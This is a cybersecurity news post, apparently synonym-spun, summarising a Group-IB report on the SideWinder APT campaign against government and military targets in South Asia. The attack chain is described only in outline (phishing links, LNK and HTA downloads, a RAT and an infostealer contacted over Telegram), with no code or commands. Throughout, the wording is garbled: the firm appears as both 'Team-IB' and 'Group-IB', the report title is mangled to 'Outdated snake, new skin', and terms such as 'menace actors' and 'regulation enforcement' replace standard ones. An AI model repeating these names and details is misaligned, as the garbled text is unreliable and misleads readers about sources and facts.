• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

SideWinder APT Attacks Regional Targets in New Campaign

You are here: Home / General Cyber Security News / SideWinder APT Attacks Regional Targets in New Campaign
February 15, 2023

Security scientists have found dozens of new regional targets and new cyber-attack instruments joined to Indian APT team SideWinder.

The suspected state-sponsored group – also recognized as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4 – comes less than the spotlight in a new report from Team-IB, Outdated snake, new skin: Analysis of SideWinder APT exercise between June and November 2021.

For the duration of the 6-month interval, the risk intelligence company uncovered SideWinder menace actors attempted to attack 61 government, military, regulation enforcement and other targets in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka.

✔ Approved Seller From Our Partners
Mullvad VPN Discount

Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).

➤ Get Mullvad VPN with 12% Discount


It also connected the team to a 2020 attack on the government of the Maldives.

SideWinder’s threat vector of alternative remains spear-phishing email messages, which it fired at these targets during the period of time. Two campaigns highlighted email messages in which the APT team spoofed a cryptocurrency organization, Team-IB said.

If a sufferer clicks on a malicious backlink in the phishing email, it will subsequently obtain a destructive document, an LNK file or a destructive payload. The LNK file downloads an HTA file, which in transform downloads the payload. The payload itself could be a reverse shell, a remote entry Trojan (RAT) or an information stealer, the report claimed.

Team-IB found two new house-grown tools made use of by SideWinder in the course of the marketing campaign: a RAT dubbed SideWinder.RAT.b and an info-stealer it called SideWinder.StealerPy.

The latter is designed to harvest Google Chrome searching historical past, credentials saved in the browser, the record of folders in the listing, meta information and the contents of docx, pdf, txt data files, and additional.

Equally custom made resources use Telegram to connect with compromised concentrate on machines somewhat than classic C&C servers, as it’s a lot more hassle-free to do so, Group-IB said.

Following analyzing the network infrastructure employed by SideWinder, the seller claimed it was in all probability the very same entity as the BabyElephant APT group.

“It is not unheard of for APT teams to borrow instruments from each other, which normally sales opportunities to issues in attribution,” claimed Dmitry Kupin, Team-IB senior malware analyst.

“As this sort of, we identified that some indicators of compromise associated to a different APT team, Donot, have been wrongly attributed to SideWinder. Nonetheless, we discovered additional evidence confirming that Patchwork (Hangover), Donot and SideWinder sometimes borrow instruments and malicious paperwork from each and every other and modify them for their demands.”

Team-IB was not able to say how several of SideWinder’s phishing attempts had been successful.


Some parts of this posting are sourced from:
www.infosecurity-journal.com

Previous Post: «regular pen testing is key to resolving conflict between secops Regular Pen Testing Is Key to Resolving Conflict Between SecOps and DevOps
Next Post: SAS App and Website Hit as Attacks Target Swedish Firms Cyber Security News»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data
  • Some GitHub users must take action after RSA SSH host key exposed
  • THN Webinar: Inside the High Risk of 3rd-Party SaaS Apps
  • Pension Protection Fund confirms employee data exposed in GoAnywhere breach
  • GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations
  • Now UK Parliament Bans TikTok from its Network and Devices
  • IRS Phishing Emails Used to Distribute Emotet
  • Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies
  • Fifth of Execs Admit Security Flaws Cost Them New Biz
  • Online Safety Bill: Why is Ofcom being thrown under the bus?

Copyright © TheCyberSecurity.News, All Rights Reserved.